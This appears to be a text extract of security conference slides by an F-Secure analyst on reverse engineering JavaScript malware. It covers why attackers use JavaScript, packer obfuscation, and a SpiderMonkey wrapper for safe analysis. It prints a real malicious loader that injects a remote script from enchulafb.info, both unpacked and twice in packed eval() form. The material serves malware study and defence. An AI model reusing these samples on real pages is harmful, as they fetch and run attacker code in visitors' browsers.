Reverse Engineering Interpreted Languages
Karmina Aquino, F-Secure Corporation
Compiled vs Interpreted
0 1 0 0 1 0 0 0 0 1 0 0 1 0 0 1
aload_0 iconst_0 iconst_3 istore_2 iload_3
Examples of Interpreted Languages
Why Javascript?
Why do malware authors use Javascript?
Cross-browser compatibility
Default HTML script language
AJAX
Supported by several applications
<script>
<iframe src ='test.js' width=0 height=0></iframe>
<!-- ***Javascript code*** --> </script>
TAGS
<script type='text/javascript'>
<script type='text/javascript' src='test.js'></script>
document.write() document.createElement()
eval()
location.reload() location.replace() location.href()
onLoad() onUnload() onSubmit()
Objects and Global Functions
// Sample in its unpacked form (the eval(function(p,a,c,k,e,r){...}) blob
// below is the same loader after Dean Edwards' /packer/): it injects a
// remote <script> element into the page's <head>.
loadScript_YOU(); // the call precedes the declaration; it works because function declarations are hoisted
function loadScript_YOU() {
  // Does nothing on HTTPS pages. The payload URL is plain http://, so this
  // presumably avoids a mixed-content block that would expose the loader — inference.
  if ('https:' == document.location.protocol) return false;
  var s = document.createElement('script');
  s.setAttribute("type","text/javascript");
  // Second-stage URL: the indicator an analyst records for blocking and for
  // searching proxy / DNS logs.
  s.setAttribute("src", "http://enchulafb.info/script.js");
  var head=document.getElementsByTagName("head")[0];
  // No <head> element → nowhere to attach the element, give up.
  if( head==null) return false;
  // Appending the element is what triggers the download and execution.
  head.appendChild(s);
  return true;
}
// Dean Edwards /packer/ output. The outer eval() first runs the unpacker,
// which rebuilds the source from the template string p: every word token
// (matched with \b...\b) is replaced by the entry of the 29-word dictionary
// (the '|'-separated string, split on '|') whose base-29 index the token
// spells (c.toString(a) with a = 29). The rebuilt text is then handed to the
// outer eval() and executed.
// The dictionary is readable as-is — loadScript_YOU, document,
// createElement, setAttribute, appendChild, http, enchulafb, info, js — so
// the loader and its download URL can be recovered without running the
// sample; a wrapper that redefines eval() to print its argument yields the
// full unpacked source.
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9 3(){4(\'b:\'==1.c.d)2 5;6 s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6 a=1.n("o")[0];4(a==p)2 5;a.q(s);2 r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|setAttribute|function||https|location|protocol|createElement|type|text|javascript|src|http|enchulafb|info|js|getElementsByTagName|head|null|appendChild|true|'.split('|'),0,{}))
// The line above is repeated verbatim (slide duplication); run as-is, the
// second eval() re-declares and re-invokes the same loader.
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3();9 3(){4(\'b:\'==1.c.d)2 5;6 s=1.e(\'7\');s.8("f","g/h");s.8("i","j://k.l/7.m");6 a=1.n("o")[0];4(a==p)2 5;a.q(s);2 r}',29,29,'|document|return|loadScript_YOU|if|false|var|script|setAttribute|function||https|location|protocol|createElement|type|text|javascript|src|http|enchulafb|info|js|getElementsByTagName|head|null|appendChild|true|'.split('|'),0,{}))
own obfuscation code
Dean Edwards /packer/
eval(function(p,a,c,k,e,d)…
anti-debugging
arguments.callee.toString() location.href document.cookie
SPIDERMONKEY
// wrapper.js — loaded ahead of the sample (js -f wrapper.js -f malware.js).
// Replaces the browser objects and global functions the sample relies on
// with stubs that print instead of act, so the shell shows what the
// payload would have done instead of doing it.

// Minimal DOM: document.write() output goes straight to stdout.
document = {};
document.write = print;

// eval() becomes a printer for whatever the sample tried to evaluate, so a
// packed stage like eval(function(p,a,c,k,e,r){...}) dumps its unpacked
// source instead of running it.
eval = function (input_string) {
  var shown = "eval(" + input_string + ")";
  print(shown);
};

// and so on — a sample that touches other members (document.location,
// createElement, getElementsByTagName as in the loader above) needs
// matching stubs, otherwise the shell throws before the interesting part.
js.exe -f wrapper.js -f malware.js
https://developer.mozilla.org/En/SpiderMonkey/Introduction_to_the_JavaScript_shell
wrapper.js
Real-world Scenario